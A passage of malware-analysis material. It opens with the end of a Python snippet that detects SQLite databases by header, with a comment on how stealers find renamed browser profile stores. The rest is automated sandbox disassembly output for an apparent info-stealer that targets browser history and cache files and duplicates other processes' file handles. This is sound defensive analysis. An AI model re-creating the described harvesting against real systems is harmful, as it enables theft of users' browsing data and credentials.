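    return [name for name, content in files.items() if is_sqlite_db(content)]


# Constructed inputs (hypothetical names): a renamed database, a lookalike
# with a wrong magic, and a plain text file.
SAMPLE_FILES = {
    "profile/logins.bin": build_header(),
    "profile/cache.db": b"SQLite format 4\x00" + bytes(84),
    "profile/notes.txt": b"plain text, not a database",
}

if __name__ == "__main__":
    for name in find_sqlite_stores(SAMPLE_FILES):
        print(name, parse_sqlite_header(SAMPLE_FILES[name]))
```

Because the check is on content, renaming or moving a profile database does not hide it from this kind of harvester; conversely, a detection that keys only on well-known file names misses copies the stealer would still find.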

APIs
  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
• memset.MSVCRT ref: 00414C87
• RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
• wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: AddressCloseProcVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 2705122986-2036018995
• Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
• Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
• Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
• Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmpqsort
• String ID: /nosort$/sort
• API String ID: 1579243037-1578091866
• Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
• Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
• Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
• Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040E60F
• memset.MSVCRT ref: 0040E629
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
• Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memsetwcslen$AttributesFilewcscatwcscpy
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• API String ID: 3354267031-2114579845
• Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
• Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
• Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
• Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
• SizeofResource.KERNEL32(?,00000000), ref: 004148D4
• LoadResource.KERNEL32(?,00000000), ref: 004148E4
• LockResource.KERNEL32(00000000), ref: 004148EF
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
• Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
• Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
• Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                      • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                                                                      • String ID: }A
                                                                                                                                                                                                                      • API String ID: 1821831730-2138825249
                                                                                                                                                                                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@DeleteObject
                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                      • API String ID: 1103273653-628097481
                                                                                                                                                                                                                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$memcmp
                                                                                                                                                                                                                      • String ID: $$8
                                                                                                                                                                                                                      • API String ID: 2808797137-435121686
                                                                                                                                                                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

Strings
• too many columns on %s, xrefs: 00430763
• duplicate column name: %s, xrefs: 004307FE
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID:
• String ID: duplicate column name: %s$too many columns on %s
• API String ID: 0-1445880494
• Opcode ID: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
• Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
• Opcode Fuzzy Hash: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
• Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
  • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
• FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
• DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
• CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
• String ID:
• API String ID: 1042154641-0
• Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
• Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
• Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
• Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• ??3@YAXPAX@Z.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
• String ID:
• API String ID: 2947809556-0
• Opcode ID: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
• memset.MSVCRT ref: 00403A55
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
• String ID: history.dat$places.sqlite
• API String ID: 3093078384-467022611
• Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
• Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
• Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
• Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
• GetLastError.KERNEL32 ref: 00417627
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• API String ID: 839530781-0
• Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
• Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
• Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
• Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: FileFindFirst
• String ID: *.*$index.dat
• API String ID: 1974802433-2863569691
• Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
• Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3831604043-0
                                                                                                                                                                                                                      • Opcode ID: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                                                                                                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                                                                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1631957507-0
                                                                                                                                                                                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1125800050-0
                                                                                                                                                                                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
